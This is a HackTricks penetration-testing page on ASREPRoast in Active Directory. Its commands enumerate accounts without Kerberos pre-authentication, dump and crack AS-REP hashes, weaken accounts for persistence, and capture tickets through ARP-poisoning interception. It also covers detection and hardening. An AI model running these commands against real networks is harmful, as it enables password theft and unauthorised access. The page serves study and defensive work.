asreproast.md (8290B)
1 --- 2 title: "ASREPRoast" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/asreproast.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/asreproast.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # ASREPRoast 14 15 ## ASREPRoast 16 17 ASREPRoast is a security attack that exploits users who lack the **Kerberos pre-authentication required attribute**. Essentially, this vulnerability allows attackers to request authentication for a user from the Domain Controller (DC) without needing the user's password. The DC then responds with a message encrypted with the user's password-derived key, which attackers can attempt to crack offline to discover the user's password. 18 19 The main requirements for this attack are: 20 21 - **Lack of Kerberos pre-authentication**: Target users must not have this security feature enabled. 22 - **Connection to the Domain Controller (DC)**: Attackers need access to the DC to send requests and receive encrypted messages. 23 - **Optional domain account**: Having a domain account allows attackers to more efficiently identify vulnerable users through LDAP queries. Without such an account, attackers must guess usernames. 24 25 #### Enumerating vulnerable users (need domain credentials) 26 27 ```bash 28 Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView 29 ``` 30 31 ```bash 32 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName 33 ``` 34 35 #### Request AS_REP message 36 37 ```bash 38 # Installed package entrypoint (same logic as GetNPUsers.py) 39 impacket-GetNPUsers -no-pass -usersfile usernames.txt -dc-ip <dc_ip> <domain>/ -format hashcat -outputfile hashes.asreproast 40 # Use domain creds to LDAP-enumerate roastable users and request them 41 impacket-GetNPUsers <domain>/<user>:<pass> -request -format hashcat -outputfile hashes.asreproast 42 # If you are running directly from the examples/ directory 43 python GetNPUsers.py -no-pass <domain>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast 44 ``` 45 46 ```bash 47 .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username] [/aes] 48 Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast) 49 ``` 50 51 > [!WARNING] 52 > Rubeus requests **RC4** by default, so Event ID **4768** usually shows **preauth type 0** and **ticket encryption type 0x17**. If you add **`/aes`** (or RC4 is disabled for the target), expect **AES etypes** instead.<sup>[[2]](#references)</sup> 53 54 #### Quick one-liners (Linux) 55 56 - Enumerate potential targets first (e.g., from leaked build paths) with Kerberos userenum: `kerbrute userenum users.txt -d domain --dc dc.domain` 57 - Roast a whole username list without valid creds using NetExec: `netexec ldap <dc> -u users.txt -p '' --asreproast out.asreproast`<sup>[[3]](#references)[[4]](#references)</sup> 58 - If you do have creds, let NetExec query LDAP and request every roastable account for you: `netexec ldap <dc> -u <user> -p '<pass>' --asreproast out.asreproast [--kdcHost <dc_fqdn>]`<sup>[[3]](#references)</sup> 59 - If the output starts with **`$krb5asrep$23$`**, crack it with Hashcat **`-m 18200`**. If it starts with **`$krb5asrep$17$`** or **`$krb5asrep$18$`**, prefer John **`--format=krb5asrep`**.<sup>[[1]](#references)[[2]](#references)</sup> 60 61 ### Cracking 62 63 Don't assume every AS-REP roast is RC4. Modern tooling can return **RC4** (`$krb5asrep$23$`) or **AES** (`$krb5asrep$17$` / `$krb5asrep$18$`) depending on the requested/negotiated enctype. **`hashcat -m 18200`** is for **etype 23**, while **John** handles `krb5asrep` directly for **17/18/23**.<sup>[[1]](#references)[[2]](#references)</sup> 64 65 ```bash 66 john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast 67 hashcat -m 18200 -a 0 hashes.asreproast passwords_kerb.txt # RC4 / etype 23 68 ``` 69 70 ### Persistence 71 72 Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties): 73 74 ```bash 75 # Toggle DONT_REQ_PREAUTH on (run it again to toggle it back off during cleanup) 76 Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose 77 ``` 78 79 ```bash 80 # Enable ASREPRoastability 81 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user' 82 # Cleanup 83 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 remove uac -f DONT_REQ_PREAUTH 'target_user' 84 ``` 85 86 ### Detection and hardening 87 88 A successful roast produces a **4768** event on the DC with `Status=0x0` and `PreAuthType=0`. Do not require RC4 in the detection: `TicketEncryptionType=0x17` is a useful weak-encryption signal, but an attacker can request AES (event-log values `0x11`/`0x12`). On Windows Server 2016 and later with the January 14, 2025 (or newer) cumulative update, version 2 of event 4768 also exposes `ClientAdvertizedEncryptionTypes`, the account/DC supported etypes and available keys.<sup>[[5]](#references)</sup> 89 90 A practical hunt flags a client advertising only RC4 while the account has AES keys, then correlates bursts from one source IP across several no-preauth users. Baseline legitimate exceptions rather than alerting on every `PreAuthType=0` event. 91 92 The durable fix is to clear **Do not require Kerberos preauthentication** on every user that does not strictly need it and rotate exposed account passwords. If an exception cannot be removed, use a long randomly generated password and minimal privileges. Disabling RC4 raises cracking cost but does not remove roastability because AES AS-REP responses remain offline-crackable.<sup>[[2]](#references)[[5]](#references)</sup> 93 94 ## ASREProast without credentials 95 96 An on-path attacker can capture the AS-REP returned during a normal, preauthenticated AS exchange and format its encrypted part for offline cracking. Unlike classic ASREPRoasting, this does not require `DONT_REQ_PREAUTH`; however, it only yields accounts whose Kerberos exchange is actually intercepted. **ASRepCatcher** obtains the position with one-way ARP poisoning by default, or it can consume traffic from another MitM technique with `--disable-spoofing`.<sup>[[6]](#references)</sup>\ 97 If you want the related no-credential trick that returns a **service ticket** instead of a **TGT** from a no-preauth principal, see [Kerberoast](/hacktricks/windows-hardening/active-directory-methodology/kerberoast). 98 99 In `relay` mode, [ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) forwards intercepted AS-REQs and forces **RC4** when both sides still allow it. `listen` does not alter packets and therefore captures whichever enctype the client and DC negotiated. Scope poisoning with `-t`/`-tf` rather than touching the entire subnet when possible.<sup>[[6]](#references)</sup> 100 101 ```bash 102 # Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported 103 ASRepCatcher relay -dc $DC_IP 104 105 # Disabling ARP spoofing, the mitm position must be obtained differently 106 ASRepCatcher relay -dc $DC_IP --disable-spoofing 107 108 # Passive listening of AS-REP packets, no packet alteration 109 ASRepCatcher listen 110 111 # Scope targets and save directly in Hashcat format 112 ASRepCatcher relay -dc $DC_IP -t 192.168.1.0/24 -outfile hashes.asreproast -format hashcat 113 ``` 114 115 --- 116 117 118 --- 119 120 ## References 121 122 - [1] [AS-REP Roasting – ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) 123 - [2] [Roasting AES AS-REPs – MWR CyberSec](https://mwrcybersec.com/roasting-aes-as-reps) 124 - [3] [NetExec Wiki – ASREPRoast](https://www.netexec.wiki/ldap-protocol/asreproast) 125 - [4] [0xdf – HTB Bruno (AS-REP roast → ZipSlip → DLL hijack)](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html) 126 - [5] [Microsoft – Event 4768: A Kerberos authentication ticket was requested](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4768) 127 - [6] [Yaxxine7 – ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher)